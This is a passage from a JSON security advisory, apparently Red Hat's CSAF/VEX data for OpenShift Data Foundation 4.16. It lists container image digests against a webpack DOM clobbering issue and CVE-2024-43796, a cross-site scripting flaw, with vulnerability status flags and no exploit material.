"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
